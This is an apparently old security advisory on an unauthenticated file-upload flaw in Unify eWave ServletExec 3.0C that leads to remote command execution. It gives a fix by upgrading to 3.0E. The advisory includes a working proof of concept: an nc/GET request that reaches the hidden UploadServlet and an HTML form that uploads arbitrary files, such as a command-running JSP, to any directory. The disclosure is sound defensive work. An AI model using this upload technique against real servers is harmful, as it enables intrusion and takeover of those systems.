|
|
|
|
| |
Unify's eWave ServletExec is a JSP and a Java Servlet engine which is used as a plug-in to popular web servers like Apache, IIS, Netscape, etc.
ServletExec has a servlet called "UploadServlet" in its server side classes. UploadServlet, when invoked, allows an attacker to upload any file to any directory on the server. The uploaded file may have code that can later be executed on the server, leading to remote command execution. |
| |
Credit:
The information has been provided by Shreeraj Shah, Saumil Shah and Stuart McClure.
Please contact the vendor for further details at info at unify.com or Unify Sales at 1-800-248-6439.
|
| |
Vulnerable systems:
Unify eWave ServletExec version 3.0C
Immune systems:
Unify eWave ServletExec version 3.0E
ServletExec has com.unify.ewave.servletexec.UploadServlet residing in its server side classes. Even though this servlet is not registered, it can be invoked on the server side by the following HTTP requests:
nc 10.0.0.1 80
GET /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0
-or-
http://10.0.0.1/servlet/com.unify.ewave.servletexec.UploadServlet
An attacker can create an HTML form on his or her local system to use this servlet to upload arbitrary files on to the server. A sample of such a form is given below:
<FORM METHOD=POST ENCTYPE='multipart/form-data' ACTION='http://10.0.0.1/servlet/com.unify.ewave.servletexec.UploadServlet'>
<P>
Upload Directory:
<INPUT TYPE=TEXT SIZE=35 Name=uploadDir>
<P>
File to Upload:
<INPUT TYPE=FILE SIZE=35 NAME=File1>
<P>
<INPUT TYPE=SUBMIT NAME="Upload Files" VALUE="Upload Files">
</FORM>
Using this upload form, an attacker can upload a file, for example a JSP file that can run arbitrary commands on the server side.
Solution:
Upgrade to ServletExec version 3.0E, available at:
http://www.servletexec.com/downloads/
|
|
|
|
|
|
|
|
|
|
